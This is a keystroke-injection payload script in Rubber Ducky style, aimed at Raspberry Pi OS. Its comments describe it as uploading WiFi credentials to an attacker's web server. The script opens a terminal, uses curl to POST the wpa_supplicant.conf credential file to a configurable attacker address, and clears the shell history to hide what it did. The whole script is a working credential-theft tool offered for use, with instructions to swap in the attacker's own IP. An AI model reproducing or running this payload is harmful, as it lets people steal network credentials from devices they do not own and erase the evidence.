REM ===========================================================================
REM Author: fierceoj
REM Description: Upload WiFi creds to attacker web server
REM Target: Raspberry Pi OS
REM Usage: Change attacker IP/URL and port to yours
REM Usage: Attacker server must be ready to accept files via HTTP POST requests
REM ===========================================================================
DELAY 3000
CTRL-ALT F1
DELAY 200

REM POST WiFi creds to attacker server
STRING curl -F file=@/etc/wpa_supplicant/wpa_supplicant.conf http://127.0.0.1:80/
DELAY 200
ENTER 

REM Clear command history
STRING history -c
DELAY 200
ENTER